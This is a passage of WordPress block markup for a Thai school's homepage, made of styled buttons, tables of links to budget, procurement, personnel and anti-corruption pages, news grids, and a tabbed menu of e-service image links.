gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1704\">แผนกลยุทธ์หรือแผนพัฒนาคุณภาพการศึกษาของสถานศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1754\">แผนปฏิบัติการและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=784\">คู่มือหรือแนวทางปฏิบัติงานของครู และบุคลากรทางการศึกษา</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1540\">รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุและความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ ประจำปีงบประมาณ พ.ศ .2568</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1571\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี งบประมาณ พ.ศ .2567</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1003\" data-type=\"page\" data-id=\"1003\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=900\" data-type=\"page\" data-id=\"1003\">ประมวลจริยธรรม และการขับเคลื่อนจริยธรรม</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=712\" data-type=\"page\" data-id=\"712\">แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\"></a><a href=\"http://pakhaeng.ssk.in.th/?page_id=859\" data-type=\"page\" data-id=\"859\">ประกาศเจตนารมณ์และการสร้างวัฒนธรรม ตามนโยบาย No Gift Policy จากการปฏิบัติหน้าที่</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1032\">การประเมินความเสี่ยงที่อาจเกิดการให้หรือรับสินบนจากการดำเนินงานตามภารกิจของสถานศึกษา  ประจำปีงบประมาณ พ.ศ .2568</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1697\" data-type=\"page\" data-id=\"1010\">แนวทาง/โครงการ/กิจกรรมการป้องกันการทุจริต</a></td></tr><tr><td><a href=\"http://pakhaeng.ssk.in.th/?page_id=1594\">มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในสถานศึกษา</a></td></tr><tr><td></td></tr><tr><td></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/grid1 {\"blockId\":\"stv6u8re\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%82%e0%b9%88%e0%b8%b2%e0%b8%a7%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingColor\":\"#ffffff\",\"headingHoverColor\":\"#000000\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"taxotermfSize\":{\"md\":12}} /-->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"8rsrezsy\",\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":40},\"thumbnailHeight\":{\"md\":200},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"4\",\"headingText\":\"ผลงานนักเรียน/ครู\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ผลงานนักเรียน/ครู\",\"value\":\"%e0%b8%9c%e0%b8%a5%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%99%e0%b8%b1%e0%b8%81%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%84%e0%b8%a3%e0%b8%b9\"}],\"content-itemBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"meta-fieldsMargin\":{\"md\":{\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"headingColor\":\"#000000\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":20},\"thumbnailAllPadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleHoverColor\":\"#ff6900\",\"titleWeight\":\"500\",\"titlefSize\":{\"md\":16},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"readmoreColor\":\"#000000\",\"readmoreBgColor\":\"#eee9da\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}}} /-->\n\n<!-- wp:spacer {\"height\":\"30px\"} -->\n<div style=\"height:30px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"y6fpy3h2\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":3,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showTaxonomy\":false,\"taxoPosition\":\"over_bottom_right\",\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"\\u0026#8210;\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":300},\"thumbnailHeightUnits\":{\"md\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"3\",\"headingText\":\"วารสารประชาสัมพันธ์\",\"headingStyle\":\"heading4\",\"category-terms\":[{\"label\":\"วารสารประชาสัมพันธ์\",\"value\":\"%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c\"}],\"viewBgColor\":\"#27ccc105\",\"headingHoverColor\":\"#ffffff\",\"headingBgColor\":\"#ff6900\",\"headingWeight\":\"500\",\"headingfSize\":{\"md\":22},\"paginationMargin\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"-40\",\"left\":\"\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_bd7bab-81\",\"columns\":1,\"colLayout\":\"equal\",\"firstColumnWidth\":0,\"secondColumnWidth\":0,\"thirdColumnWidth\":0,\"fourthColumnWidth\":0,\"fifthColumnWidth\":0,\"sixthColumnWidth\":0,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_a02c00-db\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_a02c00-db\"><div class=\"kt-inside-inner-col\"><!-- wp:kadence/tabs {\"uniqueID\":\"14_8cac31-6c\",\"tabCount\":2,\"currentTab\":2,\"contentBgColor\":\"rgba(171,184,195,0.02)\",\"contentBorderStyles\":[{\"top\":[\"#bcbcbc\",\"\",1],\"right\":[\"#bcbcbc\",\"\",1],\"bottom\":[\"#bcbcbc\",\"\",1],\"left\":[\"#bcbcbc\",\"\",1],\"unit\":\"px\"}],\"tabAlignment\":\"center\",\"titles\":[{\"text\":\"E-SERVICE\",\"icon\":\"fe_box\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"},{\"text\":\"เมนูระบบบริการ\",\"icon\":\"fe_airplay\",\"iconSide\":\"left\",\"onlyIcon\":false,\"subText\":\"\",\"anchor\":\"\"}],\"titleColor\":\"#000000\",\"titleColorHover\":\"#f78da7\",\"titleColorActive\":\"#ff6900\",\"titleBg\":\"var(\\u002d\\u002dglobal-palette9, #ffffff)\",\"titleBgHover\":\"#ffffff\",\"titleBgActive\":\"#ffffff\",\"titleBorder\":\"#ffffff\",\"titleBorderHover\":\"#8ed1fc\",\"titleBorderActive\":\"#8ed1fc\",\"titleBorderWidth\":[1,1,0,1],\"titleBorderRadius\":[4,4,0,0],\"titlePadding\":[8,20,8,20],\"titleMargin\":[0,8,-1,0],\"size\":\"1.299\",\"sizeType\":\"em\",\"lineHeight\":1.4,\"lineType\":\"em\",\"tabSize\":\"\",\"mobileSize\":\"\",\"fontWeight\":\"400\",\"widthType\":\"percent\",\"tabWidth\":[3,\"\",\"\"],\"gutter\":[0,\"\",\"\"]} -->\n<div class=\"wp-block-kadence-tabs alignnone\"><div class=\"kt-tabs-wrap kt-tabs-id14_8cac31-6c kt-tabs-has-2-tabs kt-active-tab-2 kt-tabs-layout-tabs kt-tabs-tablet-layout-inherit kt-tabs-mobile-layout-inherit kt-tab-alignment-center \"><ul class=\"kt-tabs-title-list kb-tabs-list-columns kb-tab-title-columns-3\"><li id=\"tab-e-service\" class=\"kt-title-item kt-title-item-1 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-inactive\"><a href=\"#tab-e-service\" data-tab=\"1\" class=\"kt-tab-title kt-tab-title-1 \"><span data-name=\"fe_box\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">E-SERVICE</span></a></li><li id=\"tab-\" class=\"kt-title-item kt-title-item-2 kt-tabs-svg-show-always kt-tabs-icon-side-left kt-tab-title-active\"><a href=\"#tab-\" data-tab=\"2\" class=\"kt-tab-title kt-tab-title-2 \"><span data-name=\"fe_airplay\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-title-text\">เมนูระบบบริการ</span></a></li></ul><div class=\"kt-tabs-content-wrap\"><!-- wp:kadence/tab {\"uniqueID\":\"48d9e9-20\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-1 kt-inner-tab48d9e9-20\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":723,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1623\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย.png\" alt=\"\" class=\"wp-image-723\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1643,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbycBeyhT3IIhjxxhUEISZlk1PeiQ-TJMZ0qNb8vkV8RMj-segmqLGSYF7D700852852/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/AQ.png\" alt=\"\" class=\"wp-image-1643\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":724,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด.png\" alt=\"\" class=\"wp-image-724\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"https://script.google.com/macros/s/AKfycbxEPByU7gv9jSnVVgZ9Epw9Zr5jO-O8WnCpXvsB67C6vI1y9u66n4BYnLjRvd9FT-si/exec\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":725,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม.png\" alt=\"\" class=\"wp-image-725\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1604,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-1.png\" alt=\"\" class=\"wp-image-1604\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab -->\n\n<!-- wp:kadence/tab {\"id\":2,\"uniqueID\":\"6fe435-37\"} -->\n<div class=\"wp-block-kadence-tab kt-tab-inner-content kt-inner-tab-2 kt-inner-tab6fe435-37\"><div class=\"kt-tab-inner-content-inner\"><!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":726,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://slp.ssk.in.th/slweb/\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/SLIP-SSK-1.webp\" alt=\"\" class=\"wp-image-726\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1682,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1684\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/report.png\" alt=\"\" class=\"wp-image-1682\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"https://pakheang.my.canva.site/docmentorderv2\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" 